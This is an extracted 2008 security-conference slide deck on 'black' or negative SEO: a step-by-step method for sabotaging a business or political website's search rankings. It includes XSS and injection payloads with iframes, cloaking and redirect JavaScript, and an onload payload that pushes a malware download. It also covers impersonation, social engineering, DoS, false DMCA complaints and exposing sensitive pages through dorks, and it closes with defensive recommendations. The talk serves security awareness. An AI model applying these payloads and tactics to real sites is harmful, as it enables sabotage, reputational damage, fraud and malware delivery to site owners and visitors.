+ All Categories
Home > Technology > None More Black - the Dark Side of SEO

None More Black - the Dark Side of SEO

Date post: 08-May-2015
Category:
Upload: roberto-suggi-liverani
View: 19,307 times
Download: 3 times
Share this document with a friend
Description:
Black Search Engine Optimisation (SEO), often referred as negative SEO, is a term that covers sabotage techniques aiming to reduce a web site's ranking in search engine results. Black SEO techniques are typically used in business and socio-political contexts, such as information warfare.The presentation will focus on the use of these techniques to discredit a web site by making it vanish from the major search engine result pages. The discussion will also cover how to exploit common web application vulnerabilities such as Cross Site Scripting, SQL injection and other popular exploitation methods to leverage black SEO attacks. Examples will be included to demonstrate each method of exploitation, and how the vulnerabilities can be used to impact revenues and the reputation of business and political targets.Black SEO attacks represent a unique class of threats and from a security perspective, any threat which can incur a potential loss should be considered a risk. So far, some of these techniques have only existed as a discussion topic in the SEO industry. Consequently, the intent of my presentation is to bring this complex topic to light to the security community.
58
None More Black: The Dark Side of SEO © 2008 Security-Assessment.com © 2008 Security-Assessment.com Presented By Roberto Suggi Liverani
Transcript
Page 1: None More Black - the Dark Side of SEO

None More Black: The Dark Side of SEO

© 2008 Security-Assessment.com© 2008 Security-Assessment.com

Presented By Roberto Suggi Liverani

Page 2: None More Black - the Dark Side of SEO

About me

Roberto Suggi LiveraniRoberto Suggi Liverani

Security Consultant - Security-Assessment.com

h //http://www.security-assessment.com

CISSP

Web App Pen Tester

OWASP New Zealand Founder/Leader -htt // /i d h /N Z l dhttp://www.owasp.org/index.php/New_Zealand

Personal Site: http://malerisch.net

© 2008 Security-Assessment.com

Page 3: None More Black - the Dark Side of SEO

Agenda

IntroductionIntroduction

SEO (Search Engine Optimisation) – concepts, definitions

l k d f lBlack SEO – definition, security implications

Black SEO Exposed:

Methodology – the big plan

Reconnaissance – information gathering is the key

Target Resources Elimination – indirect attack techniques

Frontal attack – direct attack techniques

Collateral damage – other attack techniques

Tools – weapons of SEO destructionp

Recommendations

Case Study: personalsoftwarefinance.com – the target!

© 2008 Security-Assessment.com

Case Study: personalsoftwarefinance.com the target!

Page 4: None More Black - the Dark Side of SEO

Introduction

Top Ten Search Engine Result Page (SERP)Top Ten Search Engine Result Page (SERP)High Competitive Market

3rd - Rank/Position3 Rank/Position

Search EngineOptimisation

Techniques following search engine guidelines: White Hat SEO

© 2008 Security-Assessment.com

Techniques not following any guidelines: Black Hat SEO

Page 5: None More Black - the Dark Side of SEO

Introduction

Top Ten Search Engine Result Page (SERP)Top Ten Search Engine Result Page (SERP)High Competitive Market

3rd - Rank/Position3 Rank/Position

Black/NegativeS hSearch EngineOptimisation

Black SEO (or Negative SEO): sabotage techniques aiming to reduce

© 2008 Security-Assessment.com

a web site's ranking in search engine results

Page 6: None More Black - the Dark Side of SEO

Introduction

SEO Search Engine OptimisationSEO – Search Engine Optimisation

Search engine optimisation (SEO) is the process of improving the volume and quality of traffic to a web site from search engines viavolume and quality of traffic to a web site from search engines via "natural" ("organic" or "algorithmic") search results for targeted keywords.

TOP 10 search engines results page (SERP) = SEO industry

Some SEO terms: positioning, ranking, keywords

SEO Hats:

White Hat SEO: web promotion techniques following search engine guidelines

Black Hat SEO: web promotion techniques not following any guidelines

© 2008 Security-Assessment.com

Page 7: None More Black - the Dark Side of SEO

Black SEO Security Concept Map

Black SEO - Definition

Black SEO Security Concept Map

© 2008 Security-Assessment.com

Page 8: None More Black - the Dark Side of SEO

Security Implications 1/2

The common perception towards black SEO:The common perception towards black SEO:

Google: “There's almost nothing a competitor can do to harm your ranking or have your site removed from our index”your ranking or have your site removed from our index

General Assumption: “Black SEO is only related to SEO”

Black SEO and Security:Black SEO and Security:

IT Security still does not include this category of attacks

M t IT S it lit t d t ti th SEO tMost IT Security literature does not even mention the SEO term

The potential:

Black SEO attacks do not always involve exploitation of target vulnerabilities

50% of the OWASP Top 10 can be used to leverage black SEO50% of the OWASP Top 10 can be used to leverage black SEO attacks

Knowledge gap between SEO hackers and WEB hackers is

© 2008 Security-Assessment.com

Knowledge gap between SEO hackers and WEB hackers is reducing - Latest web spam techniques exploit XSS

Page 9: None More Black - the Dark Side of SEO

Black SEO security considerations:

Security Implications 2/2

Black SEO security considerations:

Three elements in the security model:

Search engine internal processes are not disclosed

Real unknown variable in the black SEO security model

Black SEO attacks:

Search engines process the attack

Attack results are not direct (might be visible after 3 days, 1 ( g y ,week, 1 month or might not be processed)

Attacker needs to monitor continuously attack results

© 2008 Security-Assessment.com

Target needs to realise if under attack

Page 10: None More Black - the Dark Side of SEO

Methodology

If you know the enemy and know yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy, for every victory gained you will also suffer a defeat. If you know e e y cto y ga ed you a so su e a de eat you oneither the enemy nor yourself, you will succumb in every battle.

- Sun Tzu

© 2008 Security-Assessment.com

Page 11: None More Black - the Dark Side of SEO

Methodology

Black SEO methodology:Black SEO methodology:

Target Reconnaissance

lTarget Resources Elimination

Frontal Attack

Collateral Damage

The weapons:

Search Engines, Hacking Tools, Black Hat SEO techniques, Spam Tools

What does black SEO attack?

Home/Landing Page - www.targetsite.com

Specific web page - www.targetsite.com/product/xyz.htm

© 2008 Security-Assessment.com

Page 12: None More Black - the Dark Side of SEO

Reconnaissance

© 2008 Security-Assessment.com

http://www.flickr.com/photos/kden604/203323823/

Page 13: None More Black - the Dark Side of SEO

Reconaissance

Build target backlinks/neighbors map Include:Build target backlinks/neighbors map. Include:

Key (authoritative) target resources with high Page Rank

l kDirect incoming links to target

2nd/3rd Level incoming links to target

Outcoming target links

Approach target as complex structure with relationships:

Business Target Political Target

The parent company Political Party

Subsidiary companies Political Election/Campaign

Sister companies Political Affiliates

Significant business partners Supporting Politicians

Brands/Divisions Supporters

© 2008 Security-Assessment.com

Brands/Divisions Supporters

Page 14: None More Black - the Dark Side of SEO

Build target backlinks/neighbors map Include:

Reconaissance

Build target backlinks/neighbors map. Include:

Key (authoritative) target resources with high Page Rank

l kDirect incoming links to target

2nd/3rd Level incoming links to target

Outcoming target links

© 2008 Security-Assessment.com

Page 15: None More Black - the Dark Side of SEO

Reconaissance

Other elements to consider:Other elements to consider:

Target Annual reports / Press-Releases

d l ddTarget contact names and email addresses

Target locations and branches

Target mergers/acquisitions, elections

Job/political boards, either internal to the target or external sites

Disgruntled employee or opposite faction blogs

© 2008 Security-Assessment.com

Page 16: None More Black - the Dark Side of SEO

Reconnaissance - Tools

Extrapolate target links from search engines:Extrapolate target links from search engines:

Google

d d fsite:targetsite.com – indexed pages of target site

link:targetsite.com – pages that link to target site

cache:targetsite.com – current cache of target site

info:targetsite.com – information on target site

related:targetsite.com – pages similar to target site

targetsite.com -> enter full URL into the search fields (+ all subdomains combinations)

Google News, Google Groups and Google Alerts

Yahoo: Site Explorer - http://siteexplorer.search.yahoo.com/

http://targetsite.com – includes pages indexed and pages that li k t t t it

© 2008 Security-Assessment.com

link to target site

Page 17: None More Black - the Dark Side of SEO

Reconaissance - Tools

Live Search MacrosLive Search Macros -http://search.live.com/macros/default.aspx?FORM=BJJK

Create an advanced search Macro on target site/web pageCreate an advanced search Macro on target site/web page

Other tools:

web archive org useful to identify content linked in the pastweb.archive.org – useful to identify content linked in the past

Maltego: excellent tool to display structure of any entity on the internet. http://www.paterva.com/web2/Maltego/maltego.htmlte et ttp // pate a co / eb / a tego/ a tego t

http://www.scrutinizethis.com/

http://www abouturl com/index phphttp://www.abouturl.com/index.php

http://whois.domaintools.com

http://netcraft nethttp://netcraft.net

http://www.webmaster-toolkit.com/

htt // i i hb /

© 2008 Security-Assessment.com

http://www.myipneighbors.com/

Page 18: None More Black - the Dark Side of SEO

Reconaissance - SEO Tools

Extrapolate target SEO data:Extrapolate target SEO data:

Firefox add-on: Seoquake (https://addons.mozilla.org/en-US/firefox/addon/3036)US/firefox/addon/3036)

Identify target SEO skills keywords and SERP positioning:Identify target SEO skills, keywords and SERP positioning:

Check if target uses Google Web Master and/or Yahoo Site Explorerp o e

Check if target is practicing any SEO techniques

Scan target with SEO softwareScan target with SEO software Webceo - http://www.webceo.com

Check target backlinksghttp://www.linkhounds.com/link-harvester/backlinks.php

© 2008 Security-Assessment.com

Page 19: None More Black - the Dark Side of SEO

Eliminating target resources

© 2008 Security-Assessment.com

Page 20: None More Black - the Dark Side of SEO

The neighbours target map (visual concept):

Eliminating target resources

The neighbours target map (visual concept):

Thinking like a search engine:

A link to a page = casting a votep g g

Votes are related to a specific content/information

Many votes to a site indicate that the site is “authoritative” /

© 2008 Security-Assessment.com

Many votes to a site indicate that the site is authoritative / “trusted” for a specific content = best value to user

Page 21: None More Black - the Dark Side of SEO

Eliminating target resources

Eliminating target resources:Eliminating target resources:

Remove/divert links from authoritative/trusted sites to target site

/d d l kRemove/divert direct incoming links to target site

Two main attack approaches:

Hack neighbours sites and remove links

Social engineering + direct attack

First approach not always feasible. Second approach:

Impersonate target and social engineer target resources

Motives to remove/divert link: rebranding, restructuring, maintenance, new domain, spam links, etc.

Enforce case with new domain registered as target, XSS/SQL injection, spam links, etc.

© 2008 Security-Assessment.com

Page 22: None More Black - the Dark Side of SEO

A possible attack scenario:

Eliminating target resources

A possible attack scenario:

Impact:p

Decreased quality/quantity of target neighbours

Target position and rank affected

© 2008 Security-Assessment.com

Target position and rank affected

Page 23: None More Black - the Dark Side of SEO

Frontal attacks

© 2008 Security-Assessment.com

Page 24: None More Black - the Dark Side of SEO

Frontal Attacks Table

Frontal attacks classificationFrontal attacks classification

Scope Exploit Complexity

Probability of success

AttackTimeframe

ImpactScope Exploit Complexity

Probability of success

AttackTimeframe

ImpactComplexity of success Timeframe

Decrease:• rank• position

Low/Medium

• Reversing search

High/Medium

• Web Spam as a

Long

• Crawling

Position/Rank decreased

Complexity of success Timeframe

Decrease:• rank• position

Low/Medium

• Reversing search

High/Medium

• Web Spam as a

Long

• Crawling

Position/Rank decreased

position• backlinks

Reversing search engines

Web Spam as a proof

Crawling• Indexing• Caching

Demonstrate: target is:

High Low/Medium Medium Targetban/penalisation

position• backlinks

Reversing search engines

Web Spam as a proof

Crawling• Indexing• Caching

Demonstrate: target is:

High Low/Medium Medium Targetban/penalisationtarget is:

• deceitful• fraudulent• spamming

• Target vulnerable• Low quality/quantity target backlinks

• Human review of spam reports

• Tools speedindexing (quantity/quality)

ban/penalisationtarget is: • deceitful• fraudulent• spamming

• Target vulnerable• Low quality/quantity target backlinks

• Human review of spam reports

• Tools speedindexing (quantity/quality)

ban/penalisation

The two scopes and the techniques involved have completely

p g• Moderate/Absent target SEO skills

p g• Moderate/Absent target SEO skills

p q p yopposite results

Attacker makes a choice depending on: available timeframe, kill d t t l it bilit

© 2008 Security-Assessment.com

resources, skills and target exploitability

Page 25: None More Black - the Dark Side of SEO

Decreasing target positioning

Attack: Spam social bookmarks with target URLAttack: Spam social bookmarks with target URL

Digg.com, Reddit.com, Onlywire.com, etc

l b k kAutomatic script + social bookmarks APIhttp://www.onlywire.com/api/add?url=http://targetsite&title=targetsite&comments=targetsite&tags=targetsite

Impact: Target can be banned. Target site loses links from trusted/high PR domains

Attack: Duplicate target content in:

target site (exploit stored XSS or SQL injection)

domain with higher PR of target site (buy another site)

many sites (build network of clones)

Impact: Target penalised for duplicate content

© 2008 Security-Assessment.com

Page 26: None More Black - the Dark Side of SEO

Decreasing target positioning

Attack: Submit web proxy + target site to search enginesAttack: Submit web proxy + target site to search engines

Use proxy with a higher PR and/or higher number of backlinks than targetthan target

Use proxy that do not obfuscate target URLhttp://www.zzoop.com/index.php?=&=http://targetsite/

Impact: target position may drop suddenly

http://www.zzoop.com/index.php? & http://targetsite/

Attack: Mass submissions of target to low quality web directories

Most of them are free. Low quality = n/a or PR 0

Publication can take up to 6 months. Do mass submission.

http://www.web-directories.ws

Impact: Decrease quality of neighbours. Position decreased.

© 2008 Security-Assessment.com

Page 27: None More Black - the Dark Side of SEO

Decreasing target positioning

Attack: Create backlinks to unused target subdomainAttack: Create backlinks to unused target subdomain

www.targetsite.com – 200 OK (used/promoted)

( d) b kl ktargetsite.com – 200 OK (not used) <- backlinks target

No 301 redirection and both subdomains must point to same contentcontent

Impact: Positioning affected

Attack: DoS target

Spider needs a 404 Not Found response from target

Then request removal of unavailable target pages

Impact: Target page removed from SERPS

© 2008 Security-Assessment.com

Page 28: None More Black - the Dark Side of SEO

Decreasing target positioning

Attack: Promote target site URL + dynamic content such as:Attack: Promote target site URL + dynamic content such as:

Session IDs

bl h l lVariables with long valueshttp://targetsite/?PHPSESSIONID=a8s7d8782378273827381273821s98d&productId=a9982938219038291832918391389218931&a2=9sa8d9as7d9a7d98sa7d8sa7d8asdsa&b2=120318291289381938921&login=true

Impact: positioning decreasing, pages removal or no pages caching

18291289381938921&login=true

Attack: Promote competition of target using White Hat SEO

competition

target

competition

target

competition

© 2008 Security-Assessment.com

Impact: positioning decreased

Page 29: None More Black - the Dark Side of SEO

Attack: Build fake content based on target keywords

Decreasing target positioning

Attack: Build fake content based on target keywords

Turn everything from the target keywords into education content which provides real value to end usercontent which provides real value to end user

Promote fake content with black hat/white hat SEO techniques

Fake

Legitimate

Fake

Legitimate

Fake

Legitimate

Legitimate

Legitimate

© 2008 Security-Assessment.com

Impact: positioning shift

Page 30: None More Black - the Dark Side of SEO

Target perceived as spammer

Alonzo: [after killing Roger and shooting Jeff] It's not what you know, it's what you can prove.

Training Day, 2001

© 2008 Security-Assessment.com

Page 31: None More Black - the Dark Side of SEO

Target perceived as spammer

Attack: Inject permanent links pointing to bad sites into targetAttack: Inject permanent links pointing to bad sites into target

l d

<a href=http://badsite>target site keywords</a><a href=http://badsite>spam keywords</a>

Exploit stored XSS, SQL injection in target

Injection must be stealth, deceitful, smart, balanced

Attack should last as long as possible

If possible, make cross links between target and bad sites

Impact: Penalisation and/or ban of target site

Bad site can contain:

Spam

Porn

Malicious Content (malware, virus, trojan/backdoor)

Warez/Cracks/Torrents/File Sharing Links/Illegal Files

© 2008 Security-Assessment.com

Warez/Cracks/Torrents/File Sharing Links/Illegal Files

Links to other bad sites

Page 32: None More Black - the Dark Side of SEO

Target perceived as spammer

Bad site can be:Bad site can be:

PayPerClick Page/Blog/Fake Directory/Fake Forum/Scraped Page

dBanned

Phishing

Thin Affiliate

Free link Exchange

Bad site can use:

JavaScript Redirects - JavaScript used for cloaking

Keyword Stuffing - overloaded page with excessive keywords

Backdoor pages – page that hides backdoor (+ redirection) p g p g ( )

100% Frame – frameset with one frame 100% to deceive search engines spiders

© 2008 Security-Assessment.com

Page 33: None More Black - the Dark Side of SEO

Target perceived as spammer

Hidden text/Hidden Links hidden content with intention toHidden text/Hidden Links – hidden content with intention to deceive search engines

Foreign Language – foreign language with intention to confuseForeign Language foreign language with intention to confuse search engines

Sneaky Redirects – redirection through rotating domains

Same class C IP addresses and same domain registrant details of target site

© 2008 Security-Assessment.com

Page 34: None More Black - the Dark Side of SEO

Target perceived as spammer

Attack: Promote target XSS linkAttack: Promote target XSS linkhttp://targetsite.com?search=a”><a href=http://badsite>target site keywords</a><!—http://targetsite.com?search=a”><iframe src=\\badsite></iframe><!—http://targesite.com?frameurl=http://badsite

Links must point to bad sites

p g phttp://targetsite.com?redirect=http://badsite

Promote XSS link + target keyword with black-hat SEO

Use link farms, splogs, guest books, forums, any article/page th t bl t ith d PRthat enable comments with good PR

Target site needs to appear in top 10 SERP for the keyword promotedpromoted

If attack is successful, report target to search engines with search URL, keyword and target URL, y g

Impact: Penalisation and/or ban of target

© 2008 Security-Assessment.com

Page 35: None More Black - the Dark Side of SEO

Target perceived as spammer

Attack: Inject cloaking JavaScript into target siteAttack: Inject cloaking JavaScript into target site<script language="JavaScript"> var r=document.referrer,t="",q;if(r.indexOf("google.")!=-1)t="q";if(r.indexOf("msn.")!=-1)t="q";if(r.indexOf("live.")!=-1)t="q";if(r.indexOf("yahoo.")!=-1)t="p";if(r.indexOf("altavista.")!=-1)t="q";if(r.indexOf("aol.")!=-1)t="query";if(r.indexOf("ask.")!=-1)t="q";if(document.cookie.length==0 && t.length && (document.URL.indexOf("?cloakhook=")!=-1 && ((q=r.indexOf("?"+t+"="))!=-1||(q=r.indexOf("&"+t+"="))!=-1)){window.location="http://badsite/";}</script>

Cloaking must point to bad sites

1||(q r.indexOf( & +t+ ))! 1)){window.location http://badsite/ ;}</script>

Promote cloaking hook with black-hat SEO

<a href=http://targetsite.com/?cloakhook=10>any keyword</a>

If attack is successful, report target to search engines

Impact: Penalisation and/or ban of targetp / g

© 2008 Security-Assessment.com

Page 36: None More Black - the Dark Side of SEO

Target perceived as spammer

Attack: Inject redirection into targetAttack: Inject redirection into target

HTML meta tag refresh with a very short time

dJavaScript triggering redirection onmouseover event<META http-equiv="refresh" content=“0;URL=http://badsite/buyviagra.php"><body onmouseover=“document.location(‘//badsite/buyviagra.php’)>

Impact: Penalisation and/or ban of target

Attack: Splog target

Use spam script/tool that leaves target URL in thousands of blog comments and forums

Create large number of blogs spamming target and using syndicated services such as RSS to be used in blog pingssyndicated services such as RSS to be used in blog pings

http://pingomatic.com/

I t b / li ti

© 2008 Security-Assessment.com

Impact: ban/penalisation

Page 37: None More Black - the Dark Side of SEO

Target perceived as spammer

Attack: Exploit XSS vulnerability in trusted sites to promote targetAttack: Exploit XSS vulnerability in trusted sites to promote target

Create link farm to index XSS link to target site

d l l bl h h hXssed.com lists vulnerable sites with high PR<a href=‘http://www.imdb.com/List?locations="><iframe src=//targetsite.com></iframe>’>keyword to be ranked</a>

<a href =‘http://help.yahoo.com/bin/help/redirect.cgi?to_url=http://targetsite.com’>keyword to be ranked</a>

Attack: Spam target in universities pages, forums, sites with high PR

Some EDU pages are available at low price

Use target name in the account name (reflected in URL)

<a href=‘http://groups.google.com/group/targetsite’>keyword</a>h f ‘htt // b b /t t it ’ k d /<a href=‘http://www.bebo.com/targetsite’>keyword</a>

<a href=‘http://www.mixx.com/users/targetsite’>keyword</a><a href=‘http://infostore.org/user/targetsite’>keyword</a><a href=‘http://cgi.cse.unsw.edu.au/~targetsite/targetsite.html’>keyword</a>

© 2008 Security-Assessment.com

Impact: Target ban

Page 38: None More Black - the Dark Side of SEO

Target perceived as spammer

Attack: Store copyrighted material into target siteAttack: Store copyrighted material into target site

Material pertinent to target from copyrighted sources (books, encyclopaedias white papers etc )encyclopaedias, white papers, etc.)

Issue DMCA complaint if target is US based to search engines and to target ISP

Impact: target site page temporary removal (legal case)

Attack: Spam target site in spam pagettac Spa ta get s te spa page

Use comments in spam page illegally ranking in top 10 SERPS

Exploit XSS SQL injection or any injectionExploit XSS, SQL injection or any injection

Report both spammer and target to search engines

I t t t b

© 2008 Security-Assessment.com

Impact: target ban

Page 39: None More Black - the Dark Side of SEO

Target perceived as spammer

Attack: Buy paid links on behalf of targetAttack: Buy paid links on behalf of target

Paid links marketplaces:www tnx net - www isellpagerank comwww.tnx.net www.isellpagerank.com

Inject links identified as “paid links” into target

Attack: Show target is selling paid linksAttack: Show target is selling paid-links

Target site must have a good PR (at least 3 or 4)

S ll li k t t b h lf th h li k k t lSell links on target behalf through link marketplaces

Inject links on sale through stored XSS or SQL injection

Attack: Trade links on behalf of target

Impersonate target to send emails for link trading

Inject links through XSS, SQL injection or any injection

In all cases, report target to search engines

© 2008 Security-Assessment.com

Impact: target site removal/penalisation

Page 40: None More Black - the Dark Side of SEO

Collateral Damage

© 2008 Security-Assessment.com

http://www.flickr.com/photos/mongol/447087265/

Page 41: None More Black - the Dark Side of SEO

Collateral Damage

Collateral damage: damage in terms of web marketing contextCollateral damage: damage in terms of web marketing context, reputation/image

Attack: 302 hijacking targetAttack: 302 hijacking target

Well known Google bug (not completely fixed)

Point many 302 redirections to target sitePoint many 302 redirections to target site

Implement cloaking on landing page

Target

Targethijacked

Impact: target site content displacement

© 2008 Security-Assessment.com

Page 42: None More Black - the Dark Side of SEO

Collateral Damage

Attack: Create a malware connection with targetAttack: Create a malware connection with target

Malware hosted on target site or on a third party site

h h l h lInject JavaScript which launches malware<img src=a.gif onload=javascript:document.location.href='http://malwaresite/malware.exe'; />

Report target site to: Stopbadware.org - McAfee Site Advisor –AVG Link Scanner

I t T t Sit P bli IImpact: Target Site Public Image

Attack: Google bombing/bowling target site with negative keywords

Still works on Google, Yahoo and Live

Pickup a non-common / negative-impact keyword

Promote target site link with negative keyword in good quality link farm

I t t t t ti d i

<a href=‘http://targetsite’>bad keyword</a>

© 2008 Security-Assessment.com

Impact: target reputation and image

Page 43: None More Black - the Dark Side of SEO

Collateral Damage

Attack: Spy on targetAttack: Spy on target

Impersonate web anti-spam organisation

b bl k hWarn target competition about target using black-hat SEO techniques

Impact: possible legal action against targetImpact: possible legal action against target

Att k E t t iti t SERPSAttack: Expose target sensitive pages to SERPS

Example: hidden directories, awstats, webalyzer, admin, URL with username/password etcwith username/password, etc

Google Dorks from GHDB http://johnny.ihackstuff.com/ghdb.php

Make target link indexed by search enginesMake target link indexed by search engines

Impact: exposure of statistics and sensitive data useful to competition

© 2008 Security-Assessment.com

competition

Page 44: None More Black - the Dark Side of SEO

Collateral Damage

Attack: Expose target sensitive pages to SERPSAttack: Expose target sensitive pages to SERPS

Example: hidden directories, awstats, webalyzer, admin, URL with username/password etcwith username/password, etc

Google Dorks from GHDB http://johnny.ihackstuff.com/ghdb.php

Make target link indexed by search enginesMake target link indexed by search engines

Impact: exposure of statistics and sensitive data useful to competitionco pet t o

© 2008 Security-Assessment.com

Page 45: None More Black - the Dark Side of SEO

Weapons of SEO Destruction

Xrumer http://www botmaster net/more1/Xrumer – http://www.botmaster.net/more1/

Autosubmitter

d b f f l blLarge database of forums, groups pages available

Advanced control on threads and posts

Captcha and pictocode support

ProxyURL – http://www.esrun.co.uk/blog/proxy-url-creator/

Generates large list of proxy urls

Sed (Search Engine De-optimisation) ** v0.2 RELEASED** http://malerisch.net/tools/negativeseo/sed.zip

Page generator with hidden text technique, target keyword stuffing in meta tags title tags and other HTML elementsstuffing in meta tags, title tags and other HTML elements

Associate phishing sites URLs from Millersmile archive

A i t d k d t t t

© 2008 Security-Assessment.com

Associate random spam keywords to target

Page 46: None More Black - the Dark Side of SEO

sed

© 2008 Security-Assessment.com

Page 47: None More Black - the Dark Side of SEO

sed

Keyword ystuffing on title with target keywords

Spam keywords associated to t t URL keywordstarget URL

Use of different Meta keywords with spamHeaders

Target keyword

Meta keywords with spam keywordsHTML comments with spam keywords

Latest phishing URL t t d fextracted from

Millersmile archive and associated to target keyword

© 2008 Security-Assessment.com

keyword

Page 48: None More Black - the Dark Side of SEO

Sed deployment scenario

sed

Sed deployment scenario

© 2008 Security-Assessment.com

Page 49: None More Black - the Dark Side of SEO

Case Study

Personalsoftwarefinance com fake company selling fake softwarePersonalsoftwarefinance.com – fake company selling fake software

Experiment environment factors:

h l d ( l h )Major Search Engines involved (Google, Yahoo)

Primary keywords: personal software finance

Domain name: personalsoftwarefinance.com

ICANN Registrar: Godaddy.com

Reputable Web Hosting: successfullhosting.com

SEO Tools used: Web Seo + common SEO techniques from articles, books, etc

Web stats tools: awstats, webalizer, hsphere panel tools

Site is vulnerable to common web vulnerabilities such as stored XSS, SQL injections, XSRF

© 2008 Security-Assessment.com

Page 50: None More Black - the Dark Side of SEO

Case Study

Time for the video!!!Time for the video!!!

© 2008 Security-Assessment.com

Page 51: None More Black - the Dark Side of SEO

Recommendations

Security Recommendations:Security Recommendations:

Secure the site - OWASP Testing Guide

b b l b l d h lSubscribe to Google Webmaster Tool and Yahoo Site Explorer

Check incoming and outcoming links periodically

Set Google Alert

Check/monitor web server logs constantly

Disable 302 temporary redirection if used

Do not use redirection functions

Check periodically web server directory and application source code for changes/presence of backdoors

© 2008 Security-Assessment.com

Page 52: None More Black - the Dark Side of SEO

Conclusions

And rememberAnd remember...

Q: What can I do if I'm afraid my competitor is harming my ranking in Google?ranking in Google?

Google: There's almost nothing a competitor can do to harm your ranking or have your site removed from our index. If you're concerned about another site linking to yours, we suggest contacting the webmaster of the site in question. Google aggregates and organizes information published on the web; we don't control a d o ga es o at o pub s ed o t e eb; e do t co t othe content of these pages.

© 2008 Security-Assessment.com

Page 53: None More Black - the Dark Side of SEO

Thanks!

http://www.security-assessment.comhttp://www.security assessment.comRoberto Suggi Liverani

[email protected]

© 2008 Security-Assessment.com© 2008 Security-Assessment.com

Page 54: None More Black - the Dark Side of SEO

References/Links

Negative SEO articlesNegative SEO articlesBlack - Negative SEO Hits Mainstream Media

Companies Offer to Damage Your Competitors Search Engine Rankings

Companies subvert search results to squelch criticismp q

Condemned To Google Hell - Forbes.com

'Google bowling' and negative SEO All fair in love and war Searchlight - An SEO blog by Stephan Spencer - CNET Blogs

Firms use evil SEO to kill rivals' Google rankings : News : Security - ZDNet Asia

Google allowing other webmasters to damage your siteGoogle allowing other webmasters to damage your site

Google-Proof PR - Forbes.com

In Pictures 7 Ways Your Site Can Be Sabotaged - Forbes.com

Having Fun at Donalds Expense - So How's this Happening? | Threadwatch.org

Google's Matt Cutts' Blog GoogleWashed | Threadwatch.org

Give me money or I will drop your Google Rank - Search Engine Watch Forums

Fighting Off Negative Publicity and Affiliates in the SERPs : SEO Book.com

Google Keeps Tweaking Its Search Engine - New York Times

Google Should Offer Self Defense Against Spammy Inbound Links

Google's Cookie

Michael Sutton's Blog : A Tour of the Google Blacklist

Matt Cutts Google bowling exists Threadwatch.orgg g g

Kick Your Competitor With Negative SEO? - Google Blogoscoped Forum

Negative SEO - Harming Your Competitors With SEO Negative SEO (Black SEO) Tactics - Fighting Dirty

Negative SEO At Work: Buying Cheap Viagra From Google’s Very Own Matt Cutts - Unless You Prefer Reddit? Or Topix? ::

My First Million on the Internet: Google Bowling and Negative SEO: Tearing Down Rather Than Building Up

© 2008 Security-Assessment.com

My First Million on the Internet: Google Bowling and Negative SEO: Tearing Down Rather Than Building Up

SEOmoz | Del.icio.us Cloaking to Combat Spam

Page 55: None More Black - the Dark Side of SEO

References/Links

Negative SEO articlesNegative SEO articlesSEOmoz | The Dark Side of Wikipedia

The Saboteurs Of Search - Forbes.com

SEOmoz SEO isn�t hacking - and data security tipsg y p

SEO poisoning attacks growing

Google Penalization: Text Links, Redirects Not Likely Causes - Spam Comment Links Maybe - The Story Continues - Robin Good's Latest News

Other sites can hurt your ranking | JLH Design Blog

Building Authority Websites The Right Way | Denver SEO Guy | Knox in Denver

How Much Money is a Top Google Ranking Worth to Your Business?

Google allowing other webmasters to damage your ranking

Why should I report paid links to Google?Why should I report paid links to Google?

Small treatise about e-manipulation for honest people

Forums/BlogsBl k H t SEO Bl k H t F P d b B ll tiBlack Hat SEO Black Hat Forum - Powered by vBulletin

Blackhat SEO

BlackHatCrew - Elite Webmaster SEO Forum

Blackhat SEO » Blog Archive » Free blog hosts Digerati Marketing - The better search blog

Earl Grey`s Black Hat SEO Forum and SEOBlackhat SEM Community - The first and leading Resource on Blackhat SE0Happar.com Support Forum / Register

Evaluating Google Search Quality | Bruce Cat dot com evilgreenmonkey

Google Search News

© 2008 Security-Assessment.com

Matt Cutts Gadgets, Google, and SEO IncrediBILL's Random Rants

Half’s SEO Notebook

Page 56: None More Black - the Dark Side of SEO

References/Links

Forums/Blogs:Forums/Blogs:IrishWonder’s SEO Consulting Blog

Negative SEO blog SEOassassin

Network Security Research and AI ø Blue Hat SEO-Advanced SEO Tactics øy

SEO Black Hat Forum

SEO Black Hat SEO Blog

SEO Chicks |The SEO Blog with attitude

roguespammer: A Rogue Spammerroguespammer: A Rogue Spammer

Search Engine Cloaking and Optimization Forum - SeoJeans / Hot Topics

Stefan Juhl » Internet marketing, SEO & online media monetization Welcome to Seocracy.com

Search Engine Marketing Tips & Search Engine News - Search Engine Watch

SEO Forum

Negative/Positive SEO Techniques:302 Google Jacking - Has your page been hijacked - Home "Filler Friday: Google Bombing" from Über - Better than you, daily!» H D Th D li t C t t Filt W k?How Do The Duplicate Content Filters Work?

8 ways to abuse your XSS vulnerabilities - stefanjuhl.com

Better search engine ranking Google ranking tips from a Google employee

Better search engine rankings The risk of over-optimization How to remove your competitors from MSN Live!

Hijack A Domain For 200$ at Conceptualist.com, By Sahar Sarid Funny Google's Cache Error

Google and the Mysterious Case of the 1969 Pagejackers || kuro5hin.org

Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs

Link schemes

© 2008 Security-Assessment.com

http://tech.propeller.com/viewstory/2006/07/22/google-has-a-6-month-penalty-for-using-expired-domain/

Improve search engine rankings

Page 57: None More Black - the Dark Side of SEO

References/Links

Negative/Positive SEO techniques:Negative/Positive SEO techniques:Improve search engine rankings Insider information about Google's ranking algorithm Own-the.net (Webappsec, SEO, and general Web Dev)

SEOmoz | XSS - How to get 20 .gov links in 20 minutes

Using Canonical Domains to Sabotage Competitors in Google Threadwatch.org

Stop 302 Redirects and Scrapers from Hijacking Web Page PR - Page Rank

SpewMoney™ » Blog Archive » Getting traffic from Facebook or How her milkshake brings all the boys to my website SitePoint Blogs » example.com vs. www.example.com… trouble!

Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs

The Dark Side of Search Engine Optimization - Organic SEO Wiki

Official Google Webmaster Central Blog: The Impact of User Feedback, Part 1

SEO tools/software:Blackhat SEO - Esrun » Blackhat SEO Scripts

Black Hat SEO Software Built to Make Money Fast - Black Hat SoftwareBlack Hat SEO Software Built to Make Money Fast Black Hat Software

Blackhat SEO - Esrun » GMAIL Account Creator [GAC] Dark SEO Programming

Dark SEO Programming » captcha

Dark Seo Team

dnScoop Domain Name Value History Stats Tool and ForumsdnScoop - Domain Name Value, History, Stats Tool and Forums

Free URL Redirection, No Ads! Short Free Domain Name (you.co.nr)

Google Remove URL - One for the Good Guys! » SEO Image Blog: Stardatehttp://sb.google.com/safebrowsing/update?version=goog-black-url:1:1

Free Web Analytic Search Engine Page Rank and SEO Optimization Tools - Are you GoingUp?

© 2008 Security-Assessment.com

